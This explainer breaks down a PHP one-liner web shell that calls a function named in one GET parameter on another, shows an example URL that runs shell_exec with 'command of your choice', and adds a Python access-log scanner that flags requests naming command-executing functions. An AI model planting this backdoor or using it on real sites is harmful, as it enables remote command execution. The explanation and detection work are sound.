PHP explanation for <?=($_=@$_GET[2]).@$_($_GET[1])?>
<?=         PHP short echo tag (shorthand for <?php echo)
(
$_          temporary variable
=           assignment (of temporary variable $_)
@           suppress PHP errors
$_GET[2]    value corresponding to key 2 in the array of HTTP GET values (these are the arguments you see in a URL like ?argument1=foo&argument2=foo2)
)
.           concatenate
@           suppress PHP errors (again)
$_(         use whatever you got for $_ above as a function name, called on the argument $_GET[1]
$_GET[1]    value corresponding to key 1 in the array of HTTP GET values (used as the argument here)
)
?>          PHP closing tag
-----------------
So, for example, you could go to: targetsite.xxx/vulnerable.php?1=arg1&2=arg2
where
arg1 = shell_exec (which is a PHP function that does what it sounds like)
and
arg2 = command of your choice.
$_=@$_GET[2] -> $_ equals shell_exec here.
$_($_GET[1]) -> Since $_=shell_exec, this is shell_exec($_GET[1]). $_GET[1]=arg2.
Put it together, and you get shell_exec(arg2).
You can also use keys other than 1 and 2 as in the code. Those were probably picked because they're easy to type.
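
Because the function name travels in a GET parameter, requests to this one-liner are visible in web server access logs whatever key names are used. The log check below is an added example, not part of the original gist; the sample log lines are constructed, and the list of function names is an illustrative assumption rather than a complete one.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP functions that run OS commands when called by name.
# Assumption: illustrative list, not exhaustive.
DANGEROUS_CALLABLES = {
    "shell_exec", "exec", "system", "passthru", "popen", "proc_open",
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jun/2022:11:55:00 +0000] "GET /vulnerable.php?1=id&2=shell_exec HTTP/1.1" 200 64',
    '203.0.113.7 - - [21/Jun/2022:11:55:02 +0000] "GET /vulnerable.php?1=id&2=SH%45LL_EXEC HTTP/1.1" 200 64',
    '198.51.100.4 - - [21/Jun/2022:11:56:10 +0000] "GET /search.php?q=system+requirements HTTP/1.1" 200 5120',
]


def suspicious_params(log_line):
    """Return [(key, value)] for query parameters whose entire value is the
    name of a command-executing PHP function."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes values, so SH%45LL_EXEC becomes SHELL_EXEC.
    for key, value in parse_qsl(query, keep_blank_values=True):
        # PHP resolves function names case-insensitively, so compare lower-cased.
        # Exact match only: "system requirements" in a search box is not a hit.
        if value.lower() in DANGEROUS_CALLABLES:
            hits.append((key, value))
    return hits


def scan(lines):
    """Return [(line_number, key, value)] for every suspicious parameter."""
    return [(n, k, v) for n, line in enumerate(lines, 1)
            for k, v in suspicious_params(line)]


if __name__ == "__main__":
    for line_no, key, value in scan(SAMPLE_LOG):
        print(f"line {line_no}: parameter {key!r} carries function name {value!r}")
```

This only sees GET query strings; the same check would have to run on request bodies or cookies if the file reads the name from $_POST or $_COOKIE instead.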